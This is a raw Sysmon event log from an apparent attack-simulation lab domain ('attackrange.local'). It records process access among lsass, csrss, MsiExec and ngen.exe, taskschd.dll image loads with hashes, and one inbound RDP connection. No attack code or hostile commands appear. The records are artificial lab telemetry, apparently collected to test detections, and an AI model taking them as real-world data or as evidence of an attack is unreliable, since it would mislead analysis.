14:57:20.046{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.046{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.015{A7A01FEF-EBD0-607E-D20B-00000000BB01}52647120C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.999{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D20B-00000000BB01}5264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.999{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.999{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000073613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.999{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D4AC6996A1049C0CC5AA8EF5137050A,SHA256=6ED81152D3D5DF27F930E99E8A30B920AE23E14B89309C0349FD33F3863462B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050251Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:18.552{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51983-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050250Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:20.906{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B091EBD9D0E21C743DE984C27B28176,SHA256=403495C72D833D0EC521020CBDD130ECDBCB7CF12606BE81D4907DE1D0E5719E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050249Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:20.672{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C19E0707FD8427744F0C27AC6C0EA2E4,SHA256=556ADB70B38F901F67952544E75D302E320FACA6789E31897D0E74458A9BDF69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.983{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-300C-00000000BB01}3512c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.983{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-300C-00000000BB01}3512c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.983{A7A01FEF-EBD1-607E-300C-00000000BB01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.968{A7A01FEF-EBD1-607E-310C-00000000BB01}54164340C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-300C-00000000BB01}3512c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-310C-00000000BB01}5416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-300C-00000000BB01}3512c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-300C-00000000BB01}3512c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.952{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.921{A7A01FEF-EBD1-607E-2F0C-00000000BB01}57043896C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.921{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2F0C-00000000BB01}5704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.905{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.905{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-2E0C-00000000BB01}940c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.905{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.905{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.905{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.890{A7A01FEF-EBD1-607E-2D0C-00000000BB01}71086860C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.874{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2D0C-00000000BB01}7108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.874{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.874{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-2C0C-00000000BB01}2952c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.858{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.858{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.858{A7A01FEF-EBD1-607E-2A0C-00000000BB01}4976C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft 